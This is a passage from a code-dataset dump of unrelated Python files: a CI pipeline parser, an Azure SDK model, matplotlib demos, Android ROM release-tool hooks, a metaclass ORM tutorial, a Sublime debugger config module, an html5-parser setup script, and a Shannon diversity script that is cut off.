JOBKEY_ARTIFACTS_PATHS in job[JOBKEY_ARTIFACTS]:\n artifacts[JOBKEY_ARTIFACTS_PATHS] = self.extract_str_list(job[JOBKEY_ARTIFACTS][JOBKEY_ARTIFACTS_PATHS])\n artifacts[JOBKEY_ARTIFACTS_NAME] = job[JOBKEY_ARTIFACTS][JOBKEY_ARTIFACTS_NAME] if JOBKEY_ARTIFACTS_NAME in job[JOBKEY_ARTIFACTS] else self._default_artifact_name\n artifacts[JOBKEY_ARTIFACTS_EXPIRE_IN] = job[JOBKEY_ARTIFACTS][JOBKEY_ARTIFACTS_EXPIRE_IN] if JOBKEY_ARTIFACTS_EXPIRE_IN in job[JOBKEY_ARTIFACTS] else self._default_artifact_expire_in\n job[JOBKEY_ARTIFACTS] = artifacts\n\n def _job_streamline_only(self):\n \"\"\"\n Make sure a job only part is always only/refs and only/variables\n job:name:\n only:\n refs:\n - triggers\n variables:\n - $BUILD_COOL_FEATURE\n \"\"\"\n\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS:\n if not JOBKEY_ONLY in job:\n job[JOBKEY_ONLY] = {}\n\n # Find values\n found = []\n tmp=self.extract_str_list(job[JOBKEY_ONLY], noneval=[])\n found.extend(tmp)\n if JOBKEY_ONLY_VARIABLES in job[JOBKEY_ONLY]:\n found.extend(self.extract_str_list(job[JOBKEY_ONLY][JOBKEY_ONLY_VARIABLES], noneval=[]))\n if JOBKEY_ONLY_REFS in job[JOBKEY_ONLY]:\n found.extend(self.extract_str_list(job[JOBKEY_ONLY][JOBKEY_ONLY_REFS], noneval=[]))\n\n # Remove some parts\n while JOBKEY_ONLY_REFS in found: found.remove(JOBKEY_ONLY_REFS)\n while JOBKEY_ONLY_VARIABLES in found: found.remove(JOBKEY_ONLY_VARIABLES)\n job[JOBKEY_ONLY] = {\n JOBKEY_ONLY_REFS: [ v for v in found if not v.startswith(\"$\") ],\n JOBKEY_ONLY_VARIABLES: [ v for v in found if v.startswith(\"$\") ],\n }\n\n def _job_various_tweaks(self):\n \"\"\"\n Various small tweaks\n \"\"\"\n\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS:\n # job: Make sure \"tags\" is a list\n tmp = job[JOBKEY_TAGS] if JOBKEY_TAGS in job else []\n 
job[JOBKEY_TAGS] = self.extract_str_list(tmp, noneval=[])\n\n # job: Make sure \"dependencies\" is a list\n tmp = job[JOBKEY_DEPENDENCIES] if JOBKEY_DEPENDENCIES in job else []\n job[JOBKEY_DEPENDENCIES] = self.extract_str_list(tmp, noneval=[])\n\n def _job_combine_variables(self, injectdict={}):\n \"\"\"\n Distribute variables from pipelines, ci and injected variables and ensure\n all variables sections are (k,v):(str,str) only.\n \"\"\"\n\n # Extract and fix pipeline vars (lowest priority)\n pvars=self.extract_str_dict(self._cidict[PIPELINEKEY_VARIABLES] if PIPELINEKEY_VARIABLES in self._cidict else {})\n self._cidict[PIPELINEKEY_VARIABLES] = pvars\n\n # Distribute global variables to jobs and possible fix job vars\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict):\n jvars=self.extract_str_dict(job[JOBKEY_VARIABLES] if JOBKEY_VARIABLES in job else {})\n\n # pipeline vars\n for pvar, gvalue in pvars.items():\n if not pvar in jvars:\n jvars[pvar]=gvalue\n\n # vars submitted by CI service - e.g. api trigger variables\n for civar, civalue in (self.extract_str_dict(self._forced_variables)).items():\n jvars[civar]=civalue\n\n # Additional injected vars\n for varname, varvalue in injectdict.items():\n jvars[varname]=varvalue\n\n self._cidict[jobname][JOBKEY_VARIABLES] = jvars\n\n # Remove pipeline variables dict so it won't get added again if this gets recalled\n self._cidict.pop(PIPELINEKEY_VARIABLES)\n\n def _pipeline_add_buildinfo(self, CI_COMMIT_REF_NAME, CI_PIPELINE_SOURCE, CI_COMMIT_MESSAGE, CI_COMMIT_SHA, CI_COMMIT_TAG=None):\n \"\"\"\n Distribute information about the repository and what to build from it\n See `prepare` (args forwarded) and GL docs for parameter info\n \"\"\"\n\n pd = {\n # Mark that job is executed in CI environment\n \"CI\": True,\n # Branch or tag name for which project is built\n \"CI_COMMIT_REF_NAME\": CI_COMMIT_REF_NAME,\n # Indicates how the pipeline was triggered. Options include push, web, trigger, schedule, api, pipeline\n \"CI_PIPELINE_SOURCE\": CI_PIPELINE_SOURCE,\n # Full commit message\n \"CI_COMMIT_MESSAGE\": CI_COMMIT_MESSAGE,\n # Commit hash\n \"CI_COMMIT_SHA\": CI_COMMIT_SHA,\n # CI_COMMIT_REF_NAME lowercased, shortened to 63 bytes, and with everything except 0-9 and a-z replaced with -. No leading / trailing -\n \"CI_COMMIT_REF_SLUG\": re.sub('[^0-9a-zA-Z]+', '-', CI_COMMIT_REF_NAME.lower())[:63].strip('-'),\n # The title of the commit - the full first line of the message\n \"CI_COMMIT_TITLE\": CI_COMMIT_MESSAGE.split('\\n')[0],\n # description of the commit: the message without first line, if the title is shorter than 100 characters; full message in other case.\n \"CI_COMMIT_DESCRIPTION\": CI_COMMIT_MESSAGE if len(CI_COMMIT_MESSAGE) < 100 else re.sub(r'^[^\\n]*\\n', '', CI_COMMIT_MESSAGE),\n # flag to indicate that job was triggered (Doesn't include e.g. 
push events)\n \"CI_PIPELINE_TRIGGERED\": True if CI_PIPELINE_SOURCE in [\"trigger\", \"api\", \"pipeline\", \"schedule\", \"web\"] else False\n }\n if CI_COMMIT_TAG:\n pd[\"CI_COMMIT_TAG\"] = CI_COMMIT_TAG\n self._job_combine_variables(pd)\n\n # Add job variables\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict):\n jvars=self.extract_str_dict(job[JOBKEY_VARIABLES] if JOBKEY_VARIABLES in job else {})\n jvars[\"CI_JOB_NAME\"] = jobname\n jvars[\"CI_JOB_STAGE\"] = job[JOBKEY_STAGE]\n self._cidict[jobname][JOBKEY_VARIABLES] = jvars\n\n def _evaluate_jobs(self):\n \"\"\"\n Removes all jobs that are not supposed to run\n This does evaluation of variables in |only:| section and removes all jobs whos dependencies are not matched\n \"\"\"\n\n bak_env = os.environ\n jobs_to_remove = []\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict):\n os.environ = bak_env\n job_run_script = False\n job_run_ref_ok = False\n job_run_ref_variables = len(job[JOBKEY_ONLY][JOBKEY_ONLY_VARIABLES]) == 0\n\n for jvar, jvalue in job[JOBKEY_VARIABLES].items():\n os.environ[jvar]=jvalue\n\n if JOBKEY_SCRIPT in job and job[JOBKEY_SCRIPT]:\n job_run_script = True\n elif JOBKEY_DEPENDENCIES in job and job[JOBKEY_DEPENDENCIES] and JOBKEY_ARTIFACTS in job and job[JOBKEY_ARTIFACTS]:\n job_run_script = True\n\n # No restrictions given\n if not job[JOBKEY_ONLY][JOBKEY_ONLY_REFS] and not job[JOBKEY_ONLY][JOBKEY_ONLY_VARIABLES]:\n job_run_ref_ok = True\n # Only run for triggers\n if \"triggers\" in job[JOBKEY_ONLY][JOBKEY_ONLY_REFS] and job[JOBKEY_VARIABLES][\"CI_PIPELINE_TRIGGERED\"]:\n job_run_ref_ok = True\n # Only run for commits having a tag\n if \"tags\" in job[JOBKEY_ONLY][JOBKEY_ONLY_REFS] and \"CI_COMMIT_TAG\" in job[JOBKEY_VARIABLES]:\n job_run_ref_ok = True\n # Only run for commits having a tag\n for ref in job[JOBKEY_ONLY][JOBKEY_ONLY_REFS]:\n if ref not in [\"tags\",\"triggers\"] and job[JOBKEY_VARIABLES][\"CI_COMMIT_REF_NAME\"] == ref:\n job_run_ref_ok = True\n\n # Evaluate all in variables\n for condition in job[JOBKEY_ONLY][JOBKEY_ONLY_VARIABLES]:\n split = condition.split(\"==\")\n left = os.path.expandvars(split[0].strip().strip('\"'))\n right = os.path.expandvars(split[1]).strip().strip('\"') if len(split) > 1 else None\n\n # For checking compared values\n #print(str(left) + \"<--->\" + str(right))\n\n # 5 Variable presence check\n # - $VARIABLE\n if left and right is None:\n job_run_ref_variables = True\n # 3 Checking for an empty variable\n # - $VARIABLE == \"\"\n elif left and right == \"\":\n job_run_ref_variables = True\n # 2 Checking for an undefined value\n # - $VARIABLE == \"\"\n elif \"$\" in left and right and right in [\"null\",\"nil\",\"None\"]:\n job_run_ref_variables = True\n # 1,4 Equality matching using a string\n # - $VARIABLE == \"Text\"\n # - $VARIABLE == $VARIABLE2\n elif right and left == right:\n job_run_ref_variables = True\n\n job_run = job_run_ref_ok and job_run_ref_variables and job_run_script\n if not job_run:\n jobs_to_remove.append(jobname)\n\n self._cidict = {jobname:job for (jobname,job) in self._cidict.items() if isinstance(jobname,str) and not jobname in jobs_to_remove }\n removedsomething = True\n while removedsomething:\n removedsomething = False\n jobnames = self._cidict.keys()\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict):\n for dep in job[JOBKEY_DEPENDENCIES]:\n if not dep in jobnames:\n removedsomething = 
jobname\n break\n if removedsomething:\n self._cidict = {jobname:job for (jobname,job) in self._cidict.items() if isinstance(jobname,str) and not jobname == removedsomething }\n os.environ = bak_env\n\n def _assign_ids(self):\n \"\"\"\n Assigns pipeline and job ids\n \"\"\"\n\n pipeline_id = str(self._id_generator.next_pipeline_id())\n\n # Add job-ids on stage basis, temporarly convert to matrix view for this\n matrix = self.convert_to_matrix()\n for i, stage in enumerate(matrix[MATRIXKEY_STAGES]):\n for jobname, job in matrix[MATRIXKEY_JOBS][i].items():\n jvars=self.extract_str_dict(job[JOBKEY_VARIABLES] if JOBKEY_VARIABLES in job else {})\n jvars[\"CI_PIPELINE_ID\"] = pipeline_id\n jvars[\"CI_JOB_ID\"] = str(self._id_generator.next_job_id())\n self._cidict[jobname][JOBKEY_VARIABLES] = jvars\n\n\ndef get_argument_parser(prog=None):\n import argparse\n parser = argparse.ArgumentParser(prog=prog)\n parser.add_argument('cifile', nargs='?', default='.ci.yml')\n parser.add_argument('--branch', default='master', help='The brach name for which the pipeline was triggered.')\n parser.add_argument('--source', default='trigger', help='Indicates how the pipeline was triggered.')\n parser.add_argument('--ref', default='0'*32, help='The commit ref for which the pipeline was triggered. Defaults to empty SHA.')\n parser.add_argument('--msg', default='No message.', help='Full commit message.')\n parser.add_argument('--tag', help='Commit tag.')\n parser.add_argument('--dump', action='store_true', help='Dump the completed CI configuration.')\n parser.add_argument('--dump-matrix', action='store_true', help='Dump the build matrix.')\n parser.add_argument('--dump-run', action='store_true', help='Dump how a run of the CI file would look like.')\n parser.add_argument('--env', default=[], action='append', help='Define an environment variable.')\n return parser\n\n\ndef main(argv=None, prog=None):\n parser = get_argument_parser(prog)\n args = parser.parse_args(argv)\n\n env = {}\n for item in args.env:\n key, value = item.partition('=')[::2]\n env[key] = value\n\n cifile = CiFile(variables=env)\n cifile.read_cifile(args.cifile)\n cifile.prepare_run_with(args.branch, args.source, args.msg, args.ref, args.tag)\n matrix = cifile.convert_to_matrix()\n\n if args.dump:\n print(yaml.dump(matrix))\n return 0\n\n if args.dump_matrix:\n cifile.print_matrix(matrix)\n return 0\n\n if args.dump_run:\n for i, stagename in enumerate(matrix[MATRIXKEY_STAGES]):\n stage = matrix[MATRIXKEY_JOBS][i]\n print('Stage: {}'.format(stagename))\n for jobname, job in stage.items():\n print(' Job: {}'.format(jobname))\n for cmd in job[JOBKEY_SCRIPT]:\n print(' {}'.format(cmd))\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"flux/cifile.py","file_name":"cifile.py","file_ext":"py","file_size_in_byte":25086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"330228236","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass FileServerCreateParameters(Model):\n \"\"\"Parameters supplied to the Create operation.\n\n All required parameters must be populated in order to send to Azure.\n\n :param location: Required. The region in which to create the File Server.\n :type location: str\n :param tags: The user specified tags associated with the File Server.\n :type tags: dict[str, str]\n :param vm_size: Required. The size of the virtual machine of the file\n server. For information about available VM sizes for fileservers from the\n Virtual Machines Marketplace, see Sizes for Virtual Machines (Linux).\n :type vm_size: str\n :param ssh_configuration: Required. SSH configuration for the file server.\n :type ssh_configuration: ~azure.mgmt.batchai.models.SshConfiguration\n :param data_disks: Required. Settings for the data disk which would be\n created for the file server.\n :type data_disks: ~azure.mgmt.batchai.models.DataDisks\n :param subnet: Specifies the identifier of the subnet.\n :type subnet: ~azure.mgmt.batchai.models.ResourceId\n \"\"\"\n\n _validation = {\n 'location': {'required': True},\n 'vm_size': {'required': True},\n 'ssh_configuration': {'required': True},\n 'data_disks': {'required': True},\n }\n\n _attribute_map = {\n 'location': {'key': 'location', 'type': 'str'},\n 'tags': {'key': 'tags', 'type': '{str}'},\n 'vm_size': {'key': 'properties.vmSize', 'type': 'str'},\n 'ssh_configuration': {'key': 'properties.sshConfiguration', 'type': 'SshConfiguration'},\n 'data_disks': {'key': 'properties.dataDisks', 'type': 'DataDisks'},\n 'subnet': {'key': 'properties.subnet', 'type': 'ResourceId'},\n }\n\n def __init__(self, **kwargs):\n super(FileServerCreateParameters, self).__init__(**kwargs)\n self.location = kwargs.get('location', None)\n self.tags = kwargs.get('tags', None)\n self.vm_size = kwargs.get('vm_size', None)\n self.ssh_configuration = kwargs.get('ssh_configuration', None)\n self.data_disks = kwargs.get('data_disks', None)\n self.subnet = kwargs.get('subnet', None)\n","sub_path":"azure-mgmt-batchai/azure/mgmt/batchai/models/file_server_create_parameters.py","file_name":"file_server_create_parameters.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28204404","text":"\n# coding: utf-8\n\n# In[3]:\n\n\nimport matplotlib.pyplot as plt \n\n# x axis values \nx = [1,2,3] \n# corresponding y axis values \ny = [2,4,1] \n\n# plotting the points \nfor i in range(10):\n for j in range(3):\n x[j]=x[j]+1\n y[j]=y[j]+1\n plt.plot(x, y) \n\n# naming the x axis \n plt.xlabel('x - axis') \n# naming the y axis \n plt.ylabel('y - axis') \n\n# giving a title to my graph \n plt.title('My first graph!') \n\n# function to show the plot \nplt.show() \n\n\n# In[9]:\n\n\nimport matplotlib.pyplot as plt\nimport time\nimport random\n \nysample = random.sample(range(-50, 50), 100)\n \nxdata = []\nydata = []\n \n#plt.show()\n \naxes = plt.gca()\naxes.set_xlim(0, 100)\naxes.set_ylim(-50, +50)\nline, = axes.plot(xdata, ydata, 'r-')\n \nfor i in range(100):\n xdata.append(i)\n ydata.append(ysample[i])\n line.set_xdata(xdata)\n line.set_ydata(ydata)\n plt.draw()\n plt.pause(1e-17)\n 
time.sleep(0.1)\n \n# add this if you don't want the window to disappear at the end\n #plt.show()\n\n\n# In[10]:\n\n\nimport matplotlib.pyplot as plt\n# generate axes object\nax = plt.axes()\n\n# set limits\nplt.xlim(0,10) \nplt.ylim(0,10)\n\nfor i in range(10): \n # add something to axes \n ax.scatter([i], [i]) \n ax.plot([i], [i+1], 'rx')\n\n # draw the plot\n plt.draw() \n plt.pause(0.01) #is necessary for the plot to update for some reason\n\n # start removing points if you don't want all shown\n if i>2:\n ax.lines[0].remove()\n\n","sub_path":"graph_test.py","file_name":"graph_test.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"597046614","text":"\nimport common\nimport edify_generator\n\ndef RemoveDeviceAssert(info):\n edify = info.script\n edify.AppendExtra(\"\"\"ui_print(\"Complete by hehua2008...\");\nui_print(\"...bbs.tclmobile.com.cn...\");\"\"\")\n for i in xrange(len(edify.script)):\n if \"ro.product\" in edify.script[i]:\n edify.script[i] = \"\"\"ui_print(\"****************************\");\nui_print(\"* TCL S960 *\");\nui_print(\"* BaiduROM *\");\nui_print(\"* 14.07.17 *\");\nui_print(\"* by hehua2008 *\");\nui_print(\"* bbs.tclmobile.com.cn *\");\nui_print(\"****************************\");\nui_print(\"Removing custpack bootanimation & JRD_custres...\");\nmount(\"ext4\", \"EMMC\", \"/dev/block/mmcblk0p5\", \"/custpack\");\ndelete(\"/custpack/JRD_custres/media/bootanimation.zip\");\ndelete_recursive(\"/custpack/app\",\n \"/custpack/JRD_custres\");\nunmount(\"/custpack\");\"\"\"\n return\n\ndef AddArgsForFormatSystem(info):\n edify = info.script\n for i in xrange(len(edify.script)):\n if \"format(\" in edify.script[i] and \"mmcblk0p7\" in edify.script[i]:\n edify.script[i] = 'format(\"ext4\", \"EMMC\", \"/dev/block/mmcblk0p7\", \"0\", \"/system\");'\n return\n\ndef WriteRecoveryImage(info):\n edify = info.script\n for i in xrange(len(edify.script)):\n if \"write_raw_image(\" in edify.script[i]:\n edify.script[i] = 'package_extract_file(\"recovery.img\", \"/dev/recovery\");'\n return\n\ndef RemoveRecoveryImage(info):\n edify = info.script\n for i in xrange(len(edify.script)):\n if \"recovery\" in edify.script[i]:\n edify.script[i] = 'ui_print(\"Remove update recovery script written automatically by Baidu\");'\n return\n\ndef FullOTA_InstallEnd(info):\n RemoveDeviceAssert(info)\n AddArgsForFormatSystem(info)\n RemoveRecoveryImage(info)\n# WriteRecoveryImage(info)\n\ndef IncrementalOTA_InstallEnd(info):\n RemoveDeviceAssert(info)\n RemoveRecoveryImage(info)\n# WriteRecoveryImage(info)\n\n","sub_path":"releasetools.py","file_name":"releasetools.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55981702","text":"\"\"\"\nORM全称\"Object Relational Mapping\",即对象-关系映射(map),就是把关系数据库的一行映射为一个对象,也就是一个类对应一个表,这样,\n写代码更简单,不用直接操作SQL语句.\n要编写一个ORM框架,所有的类都只能动态定义,因为只有使用者才能根据表的结构定义出对应的类来.\n让我们尝试编写一个ORM框架.\n编写底层模块的第一步,就是先把调用接口写出来.比如,使用者如果使用这个ORM框架,想定义一个User类来操作对应的数据库表User,我们期待他写出这样的代码:\n\"\"\"\n\n\n# class User(Model):\n# # 定义类的属性到类的映射\n# id = InterField('id')\n# name = StringField('name')\n# email = StringField('email')\n# password = StringField('password')\n#\n#\n# # 创建一个实例:\n# u = User(id=12345, name='Michael', email='test@orm.org', password='my-pwd')\n# # 保存到数据库:\n# 
u.save()\n\"\"\"\n其中,父类Model和属性类型StringField,IntegerField是由ORM框架提供的,剩下的魔术方法比如save()全部由metaclass自动完成.虽然metaclass的编写会比较复杂,但ORM的使用者用起来却异常简单.\n现在我们就按照上面的接口来实现该ORM.\n\"\"\"\n\n\n# 首先定义Field类,它负责保存数据库表的字段名和字段类型:\nclass Field(object):\n\n def __init__(self, name, column_type):\n self.name = name\n self.column_type = column_type\n\n def __str__(self):\n return '<%s:%s>' % (self.__class__.__name__, self.name)\n\n\n# 在Field的基础上,进一步定义各种类型的Field,比如StringField,IntegerField等待:\nclass StringField(Field):\n\n def __init__(self, name):\n super(StringField, self).__init__(name, 'varchar(100)')\n\n\nclass IntegerField(Field):\n\n def __init__(self, name):\n super(IntegerField, self).__init__(name, 'bigint')\n\n\n# 下一步,就是编写最复杂的ModelMetaclass了:\nclass ModelMetaclass(type):\n\n def __new__(cls, name, bases, attrs):\n if name == 'Model':\n return type.__new__(cls, name, bases, attrs)\n print('Found model: %s' % name)\n mappings = dict()\n for k, v in attrs.items():\n if isinstance(v, Field):\n print('Found mapping: %s ==> %s' % (k, v))\n mappings[k] = v\n for k in mappings.keys():\n attrs.pop(k)\n attrs['__mappings__'] = mappings # 保存属性和列的映射关系\n attrs['__table__'] = name # 假设表名和类名一致\n return type.__new__(cls, name, bases, attrs)\n\n\n# 以及基类Model:\nclass Model(dict, metaclass=ModelMetaclass):\n\n def __init__(self, **kw):\n super(Model, self).__init__(**kw)\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n raise AttributeError(r\"'Model' object has no attribute '%s'\" % key)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n def save(self):\n fields = []\n params = []\n args = []\n for k, v in self.__mappings__.items():\n fields.append(v.name)\n params.append('?')\n args.append(getattr(self, k, None))\n sql = 'insert into %s (%s) values (%s)' % (self.__table__, ','.join(fields), ','.join(params))\n print('SQL: %s' % sql)\n print('ARGS: %s' % str(args))\n\n\n\"\"\"\n当用户定义一个class User(Model)时,Python解释器首先在当前类User的定义中查找metaclass,如果没有找到,就继续在父类Model中查找metaclass,找到了,就使用Model中定义的metaclass的ModelMetaclass来创建User类,也就是说,metaclass可以隐式地继承到子类,但子类自己却感觉不到.\n在ModelMetaclass中,一共做了几件事情:\n1.排除掉队Model类的修改;\n2.在当前类(比如User)中查找定义的类的所有属性,如果找到以Field属性,就把它保存到一个__mappings__的dict中,同时从类属性中删除该Field属性,否则,容易造成运行时错误(实例的属性会遮盖类的同名属性);\n3.把表名保存到__table__中,这里简化为表明默认为类名.\n在Model类中,就可以定义各种操作数据库的方法,比如save(),delete(),find(),update等等.\n我们实现了save()方法,把一个实例保存到数据库中,因为有表名,属性到字段的映射和属性值的集合,就可以构造出INSERT语句\n\"\"\"\n\n\nclass User(Model):\n # 定义类的属性到类的映射\n id = IntegerField('id')\n name = StringField('name')\n email = StringField('email')\n password = StringField('password')\n\n\n# 创建一个实例:\nu = User(id=12345, name='Michael', email='test@orm.org', password='my-pwd')\n# 保存到数据库:\nu.save()\n\"\"\"\n可以看到,save(方法已经打印出了可执行的语句,以及参数列表,只需要真正连接到数据库,执行该SQL语句,就可以完成真正的功能)\n\"\"\"","sub_path":"chapter07/MyORM.py","file_name":"MyORM.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"585537783","text":"from ...typecheck import *\nfrom ...import core\nimport sublime\n\ndef _expand_variables_and_platform(json: dict, variables: Optional[dict]) -> dict:\n\tplatform = None #type: Optional[dict]\n\tif core.platform.osx:\n\t\tplatform = json.get('osx')\n\telif core.platform.linux:\n\t\tplatform = json.get('linux')\n\telif core.platform.windows:\n\t\tplatform = json.get('windows')\n\n\tif platform:\n\t\tjson = json.copy()\n\t\tfor key, value in platform.items():\n\t\t\tjson[key] = value\n\n\tif variables is not None:\n\t\treturn 
sublime.expand_variables(json, variables)\n\n\treturn json\n\n\nclass Configuration:\n\tdef __init__(self, name: str, index: int, type: str, request: str, all: dict) -> None:\n\t\tself.name = name\n\t\tself.id_ish = f'configuration_{name}_{index}'\n\t\tself.type = type\n\t\tself.request = request\n\t\tself.all = all\n\n\t@staticmethod\n\tdef from_json(json: dict, index: int) -> 'Configuration':\n\t\tname = json.get('name')\n\t\tassert name, 'expecting name for debug.configuration'\n\t\ttype = json.get('type')\n\t\tassert type, 'expecting type for debug.configuration'\n\t\trequest = json.get('request')\n\t\tassert request, 'expecting request for debug.configuration'\n\t\treturn Configuration(name, index, type, request, json)\n\nclass ConfigurationExpanded(Configuration):\n\tdef __init__(self, configuration: Configuration, variables: Any) -> None:\n\t\tall = _expand_variables_and_platform(configuration.all, variables)\n\t\tsuper().__init__(configuration.name, -1, configuration.type, configuration.request, all)\n\t\tself.verify()\n\n\tdef verify(self):\n\t\tdef warn(text: str):\n\t\t\tsublime.error_message(text)\n\n\t\tdef error(text: str):\n\t\t\traise core.Error(text)\n\n\t\tif self.type == \"python\":\n\t\t\tif self.request == \"launch\":\n\t\t\t\tif not self.all.get(\"program\"):\n\t\t\t\t\twarn(\"Warning: Check your debugger configuration.\\n\\nField `program` in configuration is empty. If it contained a $variable that variable may not have existed.\"\"\")\n\t\t\treturn\n\nclass ConfigurationCompound:\n\tdef __init__(self, name: str, index: int, configurations: List[str]) -> None:\n\t\tself.name = name\n\t\tself.id_ish = f'compound_{name}_{index}'\n\t\tself.configurations = configurations\n\n\t@staticmethod\n\tdef from_json(json: dict, index: int) -> 'ConfigurationCompound':\n\t\tname = json.get('name')\n\t\tassert name, 'expecting name for debug.compound'\n\t\tconfigurations = json.get('configurations')\n\t\tassert configurations, 'expecting configurations for debug.compound'\n\t\treturn ConfigurationCompound(name, index, configurations)","sub_path":"modules/debugger/adapter/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"236058750","text":"from human_pose import HumanPose, visual_pose,transform_from_ai, transform_to_json\nimport json\nimport cv2\nfrom easydict import EasyDict as edict\nimport pylab as plt\nimport pdb\ndef main():\n\n cfg = edict()\n cfg.data_path = 'ai_challenger_keypoint_validation_20170911'\n cfg.image_path = 'keypoint_validation_images_20170911'\n cfg.ann_file = 'keypoint_validation_annotations_20170911.json'\n dataset = HumanPose(cfg.data_path+'/'+cfg.image_path,cfg.data_path+'/'+cfg.ann_file) \n img_file = dataset.image_file_at(0)\n img = cv2.imread(img_file)\n keypoints, humans = dataset.keypoint_human_at(0)\n pdb.set_trace()\n for i in range(keypoints.shape[0]):\n ai_pose = keypoints[i].reshape((-1,3))\n coco_pose = transform_from_ai(ai_pose)\n json_pose = transform_to_json(coco_pose)\n visual_pose(img,json_pose.reshape(-1))\n cv2.rectangle(img,tuple(humans[i][:2]),tuple(humans[i][2:]),(255,0,0),2)\n plt.imshow(img[:,:,::-1])\n plt.show()\n\nif __name__ == '__main__':\n main()\n","sub_path":"dataset_api/ai_challenger/toolbox/test_tranorform.py","file_name":"test_tranorform.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"537275912","text":"#!/usr/bin/env python\n# vim:fileencoding=utf-8\n# License: Apache 2.0 Copyright: 2017, Kovid Goyal \n\nimport os\nimport sys\nfrom distutils.command.build import build as Build\nfrom itertools import chain\n\nfrom setuptools import Extension, setup\n\nself_path = os.path.abspath(__file__)\nbase = os.path.dirname(self_path)\nsys.path.insert(0, base)\nif True:\n from build import (\n SRC_DIRS, find_c_files, include_dirs, libraries, library_dirs, version, iswindows,\n TEST_COMMAND, add_python_path)\ndel sys.path[0]\n\nsrc_files = tuple(chain(*map(lambda x: find_c_files(x)[0], SRC_DIRS)))\ncargs = ('/O2' if iswindows else '-O3').split()\nif not iswindows:\n cargs.extend('-std=c99 -fvisibility=hidden'.split())\n\n\nclass Test(Build):\n\n description = \"run unit tests after in-place build\"\n\n def run(self):\n Build.run(self)\n if self.dry_run:\n self.announce('skipping \"test\" (dry run)')\n return\n import subprocess\n env = add_python_path(os.environ.copy(), self.build_lib)\n print('\\nrunning tests...')\n sys.stdout.flush()\n ret = subprocess.Popen([sys.executable] + TEST_COMMAND, env=env).wait()\n if ret != 0:\n raise SystemExit(ret)\n\n\nCLASSIFIERS = \"\"\"\\\nDevelopment Status :: 5 - Production/Stable\nIntended Audience :: Developers\nLicense :: OSI Approved :: Apache Software License\nNatural Language :: English\nOperating System :: OS Independent\nProgramming Language :: Python\nTopic :: Text Processing\nTopic :: Text Processing :: Markup\nTopic :: Text Processing :: Markup :: HTML\nTopic :: Text Processing :: Markup :: XML\n\"\"\"\n\nsetup(\n name='html5-parser',\n version='{}.{}.{}'.format(*version),\n author='Kovid Goyal',\n author_email='redacted@acme.com',\n description='Fast C based HTML 5 parsing for python',\n license='Apache 2.0',\n url='https://html5-parser.readthedocs.io',\n download_url=(\n \"https://pypi.python.org/packages/source/m/html5-parser/\"\n \"html5-parser-{}.{}.{}.tar.gz\".format(*version)),\n classifiers=[c for c in CLASSIFIERS.split(\"\\n\") if c],\n platforms=['any'],\n install_requires=['chardet', 'lxml>=3.8.0'],\n extras_require={'soup': 'beautifulsoup4'},\n packages=['html5_parser'],\n package_dir={'': 'src'},\n cmdclass={'test': Test},\n ext_modules=[\n Extension(\n 'html5_parser.html_parser',\n include_dirs=include_dirs(),\n libraries=libraries(),\n library_dirs=library_dirs(),\n extra_compile_args=cargs,\n sources=list(map(str, src_files)))])\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"35237625","text":"import csv\nimport pandas as pd\nimport numpy as np\n\n# def shannon_index(output_file, row):\n# # Filter 0 out of the row since it might cause log 0\n# row = np.array(filter(lambda x: x != 0, row))\n# # print(row)\n# P_i = row/row.sum()\n# # print(P_i)\n# shannon_index = -np.sum(P_i * np.log(P_i))\n\n# f = open(output_file, \"a\")\n# f.write(str(shannon_index))\n# f.write('\\n')\n# f.close()\n# return shannon_index\n\n# row = np.array([5, 9, 20, 0, 21, 30], dtype='float')\n# shannon_index(\"shannon.txt\", row)\n\ndef shannon_index(row):\n # Filter 0 out of the row since it might cause log 0\n row = np.array(filter(lambda x: x != 0, row))\n # print(row)\n P_i = row/row.sum()\n # print(P_i)\n shannon_index = -np.sum(P_i * np.log(P_i))\n return shannon_index\n\n\ndata = pd.read_csv('China_Jeju.an.shared', sep='\\t')\ndata = data.values\n\nf = open(\"shannon_output.txt\", 
